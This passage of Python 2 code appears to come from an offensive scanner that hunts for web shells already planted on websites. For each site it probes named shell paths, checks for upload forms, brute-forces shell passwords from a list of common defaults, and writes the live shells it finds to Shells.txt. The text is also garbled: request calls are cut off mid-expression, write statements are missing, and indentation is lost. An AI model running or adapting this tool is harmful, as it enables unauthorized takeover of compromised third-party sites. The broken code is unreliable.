p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH18_J_content = requests.get(SH18_J,timeout=15).content
if ' type="file"' in SH18_J_content or ' type=\'file\'' in SH18_J_content or ' type= "file"' in SH18_J_content or ' type= \'file\'' in SH18_J_content or ' type = "file"' in SH18_J_content or ' type = \'file\'' in SH18_J_content or ' type ="file"' in SH18_J_content or ' type =\'file\'' in SH18_J_content or ' type=file' in SH18_J_content or ' type =file' in SH18_J_content or ' type= file' in SH18_J_content or ' type = file' in SH18_J_content or 'Upload</a> ]</li><li>[' in SH18_J_content or 'upload</a><li><a>Sym' in SH18_J_content :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH18_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH19_J_content = requests.get(SH19_J,timeout=15).content
if ' type="file"' in SH19_J_content or ' type=\'file\'' in SH19_J_content or ' type= "file"' in SH19_J_content or ' type= \'file\'' in SH19_J_content or ' type = "file"' in SH19_J_content or ' type = \'file\'' in SH19_J_content or ' type ="file"' in SH19_J_content or ' type =\'file\'' in SH19_J_content or ' type=file' in SH19_J_content or ' type =file' in SH19_J_content or ' type= file' in SH19_J_content or ' type = file' in SH19_J_content or 'Upload</a> ]</li><li>[' in SH19_J_content or 'upload</a><li><a>Sym' in SH19_J_content :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH19_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH20_J_content = requests.get(SH20_J,timeout=15).content
if ' type="file"' in SH20_J_content or ' type=\'file\'' in SH20_J_content or ' type= "file"' in SH20_J_content or ' type= \'file\'' in SH20_J_content or ' type = "file"' in SH20_J_content or ' type = \'file\'' in SH20_J_content or ' type ="file"' in SH20_J_content or ' type =\'file\'' in SH20_J_content or ' type=file' in SH20_J_content or ' type =file' in SH20_J_content or ' type= file' in SH20_J_content or ' type = file' in SH20_J_content or 'Upload</a> ]</li><li>[' in SH20_J_content or 'upload</a><li><a>Sym' in SH20_J_content :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH20_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH21_J_content = requests.get(SH21_J,timeout=15).content
if ' type="file"' in SH21_J_content or ' type=\'file\'' in SH21_J_content or ' type= "file"' in SH21_J_content or ' type= \'file\'' in SH21_J_content or ' type = "file"' in SH21_J_content or ' type = \'file\'' in SH21_J_content or ' type ="file"' in SH21_J_content or ' type =\'file\'' in SH21_J_content or ' type=file' in SH21_J_content or ' type =file' in SH21_J_content or ' type= file' in SH21_J_content or ' type = file' in SH21_J_content or 'Upload</a> ]</li><li>[' in SH21_J_content or 'upload</a><li><a>Sym' in SH21_J_content :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH21_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def WordPress2(site):
site = URL(site)
now =
